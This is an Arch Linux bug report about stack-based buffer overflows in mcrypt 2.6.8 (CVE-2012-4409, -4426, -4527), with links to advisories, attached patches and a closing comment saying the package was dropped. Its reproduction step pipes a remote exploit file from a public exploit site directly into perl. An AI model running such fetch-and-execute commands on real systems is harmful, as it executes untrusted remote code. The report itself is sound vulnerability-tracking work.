FS#32877 - [mcrypt] multiple security issues
Attached to Project:
Arch Linux
Opened by Jens Adam (byte) - Tuesday, 27 November 2012, 09:30 GMT
Last edited by Jan de Groot (JGC) - Thursday, 04 July 2013, 11:12 GMT
Opened by Jens Adam (byte) - Tuesday, 27 November 2012, 09:30 GMT
Last edited by Jan de Groot (JGC) - Thursday, 04 July 2013, 11:12 GMT
|
Details
Description:
"mcrypt versions 2.6.8 and below suffer from a vulnerability that is caused due to a boundary error in the processing of an encrypted file, which can be exploited to cause a stack-based buffer overflow when a user opens a specially crafted .nc file. Successful exploitation could potentially allow execution of arbitrary code on the affected machine." Source: http://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.html Links: http://security-tracker.debian.org/tracker/CVE-2012-4409 Steps to reproduce: $ cd /tmp && curl -s http://dl.packetstormsecurity.net/1211-exploits/mcrypt-overflow.txt | perl && mdecrypt fake.nc Our default build flags with stack protection will catch this, but a patch would be in order nonetheless. Upon further investigation there are more issues: http://security-tracker.debian.org/tracker/CVE-2012-4426 - already discussed and patched in the original thread starting at http://www.openwall.com/lists/oss-security/2012/09/06/1 http://security-tracker.debian.org/tracker/CVE-2012-4527 - another overflow regarding file names, source: https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-4527 Patches and updated PKGBUILD attached. |
This task depends upon
Closed by Jan de Groot (JGC)
Thursday, 04 July 2013, 11:12 GMT
Reason for closing: Won't fix
Additional comments about closing: mcrypt was removed from repository.
Thursday, 04 July 2013, 11:12 GMT
Reason for closing: Won't fix
Additional comments about closing: mcrypt was removed from repository.
There has been no further development on the net on this issue afaik, all other distributions had already applied the patches before I posted this here, the issue is four months old, and above is a ready-to-go PKGBUILD.
I don't care at all about mcrypt, its usefulness or upstream maintenance, but as long as packages contain security problems, we patch them, minor/obscure or not.
So: patch it, or drop it.